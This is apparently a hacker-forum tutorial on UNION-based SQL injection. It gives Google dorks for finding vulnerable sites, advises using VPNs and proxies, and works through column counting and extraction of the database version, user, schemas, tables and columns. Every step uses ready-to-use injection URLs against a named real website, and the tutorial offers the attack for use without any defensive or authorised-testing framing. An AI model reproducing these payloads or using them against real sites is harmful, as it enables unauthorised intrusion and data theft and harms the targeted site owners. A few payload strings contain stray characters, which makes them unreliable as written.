SQL(Structered Query Language) Injection | Tutorial |

Note: Remember you cant do Good in SQLI without proper knowledge in SQL CoolTongue

Tools Needed:
Hack Bar = Just download this on mozilla firefox add ons,
Dorks = Used in Dorking For targets
Fingers = for typing
VPN, Proxies, Anonymizers
BRAIN

So this Guide Covers
1st. Finding vulnerable sites
2nd. Finding number of columns
3rd. Getting INFOS ex. version,user,database
4th. Getting Databases,
5th. Getting Tables,
6th Getting Columns and Extracting Data

Some of the google Dorks Big Grin

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=



1st. Finding vulnerable sites



Type this in Google.
ex. inurl:news.php?id=
SS:http://i31.photobucket.com/albums/c374/Sp4nkstaPH/SQLI/1_zpsdf587c3c.png

Okay now.
We got this Target
Code:http://www.irishsanghatrust.ie/news.php?id=33

2nd. Finding number of columns

Ot get the number of Columns, we must use the query "order by " Basics. ok,lets try
http://www.irishsanghatrust.ie/news.php?id=33 order by 1-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 2-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 3-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 4-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 15-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 19-- => error
http://www.irishsanghatrust.ie/news.php?id=33 order by 18-- => no error

So this means. that the target has a total Of 18 Columns.

To Get the Columns and make it Show up in the webpage. We will use "UNION SELECT" Query.
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Note: If No vulnerable Columns Show up. Null the parameter. or just by adding " - " before the parameter.

3rd. Getting INFOS ex. version,user,database

There are different variables in finding and extracting data. but this only coves basics. we will only use.
@@version
@@user
@@database

if there three above does'nt work try these

version()
user()
database()


To execute this syntax. we use Concat

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,CONCAT(user(),0x3a3a,version(),0x3a3a,database()),3,4,5,6,7,8,9,10,11,1?2,13,14,15,16,17,18--

4th. Getting Databases.

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM INFORMATION_SCHEMA.SCHEMATA--

5th. Getting Tables

In order to find tables we will use "Group_concat" "from information_schema.tables where table_schema=database()--"

if your getting tables from a specific database like "information_schema"
then just change the syntax to this
" from information_schema.tables where table_schema=0xinformation_schema--

Don't forget Hexing , because sometimes it does not work because magic quotes are on.

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+?information_schema.TABLES+where+table_SCHEMA=DATABASE()--

6th Getting Columns and Extracting

So the final and exciting part, don't know for you :P|

now in this part we are extracting Datas From Column "pages"

Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from?+information_schema.columns+where+table_name=0x7061676573--

Okay Good. Now that you Got it, all you need to do is Fammiliarize it. from steps 1 to the last.

Thanks for Viewing/Reading the Tut. Hope this helps.